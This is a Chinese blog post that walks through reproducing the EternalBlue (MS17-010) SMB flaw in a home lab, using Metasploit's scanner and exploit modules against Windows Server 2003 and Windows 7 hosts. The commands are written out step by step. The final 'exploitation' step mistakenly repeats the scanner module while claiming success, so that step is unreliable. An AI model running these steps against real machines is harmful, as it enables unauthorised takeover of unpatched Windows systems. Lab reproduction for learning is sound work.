永恒之蓝(MS17010)漏洞复现

永恒之蓝(MS17010)漏洞复现文章目录介绍:准备开始复现正式开始利用介绍:永恒之蓝是指2017年4月14日晚,黑客团体ShadowBrokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序准备1.kali的ip:192.168.0.1282.WindowsServer

大家好,又见面了,我是你们的朋友全栈君。

介绍:

永恒之蓝是指黑客团体Shadow Brokers公布的大批网络攻击工具,其中就包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞来获取系统最高权限。

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,就可以进行非法操作。

准备

1.kali的ip:192.168.0.128
在这里插入图片描述
2.WindowsServer2003的ip:192.168.0.200
在这里插入图片描述
3.测试连通性:
在这里插入图片描述
在这里插入图片描述

开始复现

1.kali进入msf。 命令:msfconsole
在这里插入图片描述
2.search ms17-010 #搜索ms17010
在这里插入图片描述

  • use auxiliary/scanner/smb/smb_ms17_010 #使用模块
  • show options #显示选项
    在这里插入图片描述
  • set RHOSTS 192.168.0.200 # 设置目标主机
    在这里插入图片描述
  • 输入run或者exploit执行
  • 发现存在漏洞
    在这里插入图片描述

3.通过使用exploit/windows/smb/ms17_010_eternalblue模块进行漏洞攻击

  • use exploit/windows/smb/ms17_010_eternalblue
  • set rhosts 192.168.0.200 #设置被攻击端IP
  • run #执行

在这里插入图片描述
发现这个exp只能对64位的系统执行攻击。惨兮兮!!
哎,重来吧。
win7ip:192.168.0.129在这里插入图片描述
测试连通也没问题

正式开始利用

  1. use auxiliary/scanner/smb/smb_ms17_010 # 使用模块
    set rhosts 192.168.0.129 #设置目标IP
    run
    在这里插入图片描述
    发现存在漏洞。
    2.漏洞利用
  • use auxiliary/scanner/smb/smb_ms17_010
  • set rhosts 192.168.0.129
  • run
    在这里插入图片描述
    发现攻击成功。
    然后就可以为所欲为了。
    在这里插入图片描述
    发现有乱码,可以使用chcp 65001命令消除乱码。
    在这里插入图片描述
    至此复现结束。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/135847.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 取(2堆)石子游戏(杭电2177)「建议收藏」

    取(2堆)石子游戏(杭电2177)

    2022年1月25日
    44
  • 2018一切刚刚开始

    简单计划,努力工作,坚持输出,积极生活,让生活更加美好。开始新的一年的第一周工作,生活从新年中慢慢回归,慢慢进入节奏。每一年都会写一些新的开始的计划,然后到年终的时候很多计划都没有实现,但是不能因为很多没有实现就不去写新一年的一些想法,万一今年实现了呢?努力工作在一家公司,从一个新员工慢慢开始变成老员工了,思维方面要调整,还要有新员工的那份热情,也要老员工相应的承担了,要承…

    2022年2月27日
    35
  • 微软真好笑[通俗易懂]

    微软真好笑[通俗易懂]近日利用excel的vba开发一个个人管理软件,对微软件真有深刻体会了。vba中检测错误太搞笑了,检测到错误没有指出给开发人员,却要中断然后打包给微软件本身,搞得编写得神经十分紧张,每编完一写就要编译一下以检测错误,否则又中断,又得从头来过。这是微软为开发人员的着想吗?我只有苦笑!!编到最后试过几次都基本成功了,到晚上再试一下,却不加载窗体,连命令按钮也认识不了。

    2022年7月19日
    12
  • Excel VBA宏编程入门(五)——用户交互[通俗易懂]

    Excel VBA宏编程入门(五)——用户交互[通俗易懂]目录任务介绍选择文件夹选择文件保存路径交互选择一列交互选择一行任务介绍VBA编程中,为了程序的灵活性,有时候需要用到用户交互操作,例如让用户选择一个文件夹,用户选择一个单元格等等。本文将介绍一些常用的用户交互操作的实现选择文件夹St=Application.FileDialog(msoFileDialogFolderPicker).Show’如果选择了文件夹就返回-1,不选择文件夹就返回0IfSt<>0ThenfileDir=Application.File

    2022年6月2日
    33
  • AutoSize

    AutoSizeLabel1->AutoSize=False;//TrueLabel1->Caption=”Thisstringistoolongtobethecaptionofthislabel”;通过为知笔记发布转载于:https://www.cnblogs.com/xe2011/archive/2012/06/03/5e3ea26bf00c3f837…

    2022年6月6日
    24
  • html5不用reload重置网页,refresh和reload「建议收藏」

    html5不用reload重置网页,refresh和reload「建议收藏」location.refresh和location.reload的区别在什么location.refresh:刷新页面location.reload:重载页面javascript怎么刷新页面,要refresh不要reloadlocation.reload();下面是复制的用js实现的刷新页面的代码,比较全先来看一个简单的例子:下面以三个页面分别命名为frame.html、top.htm…

    2022年7月18日
    18

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号